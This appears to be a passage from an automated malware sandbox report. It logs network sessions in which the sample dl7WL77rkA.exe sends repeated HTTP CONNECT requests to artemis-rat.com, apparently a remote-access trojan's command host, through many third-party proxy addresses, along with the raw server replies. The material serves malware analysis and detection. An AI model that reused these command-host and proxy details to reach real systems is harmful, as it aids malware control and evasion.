                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            438192.168.2.551184139.162.238.184298703876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.280172110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.920423985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.795486927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.635662079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124744892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            439192.168.2.551323146.190.35.6380003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.281558990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.764195919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.999608994 CET19INHTTP/1.0 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            440192.168.2.551366104.25.234.81803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.282119989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.436424017 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            441192.168.2.55113145.11.95.16550253876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.285234928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.868361950 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            442192.168.2.551248190.120.249.14941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.287277937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            443192.168.2.551137182.61.38.114823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.291712046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.995987892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.320103884 CET295INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            444192.168.2.551152185.38.111.180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.294555902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.616302967 CET75INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.953599930 CET103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                            Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            445192.168.2.5512195.135.83.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.336535931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.657602072 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            446192.168.2.55120958.234.116.19781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.337542057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            447192.168.2.550376201.163.73.93554433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.337666988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.405018091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.505903006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.599611998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.826464891 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 717
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Wed, 06 Mar 2024 01:53:09 GMT
                                                                                                                                                                                                                                                            Expires: Wed, 06 Mar 2024 01:53:09 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            448192.168.2.550190142.54.235.941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.337794065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            449192.168.2.551160206.189.145.23636253876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.340781927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            450192.168.2.55126972.206.181.97649433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.340903044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            451192.168.2.55128920.210.113.32803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.342283964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.613401890 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            452192.168.2.55122195.140.124.16110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.343897104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            453192.168.2.551265211.222.252.187803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.345412970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.644738913 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            454192.168.2.55036372.210.252.13741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.347037077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            455192.168.2.551437104.19.120.84803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.366904020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.523741961 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            456192.168.2.551449172.67.219.60803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.368940115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.530021906 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            457192.168.2.551435104.24.35.152803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.369920015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.530159950 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
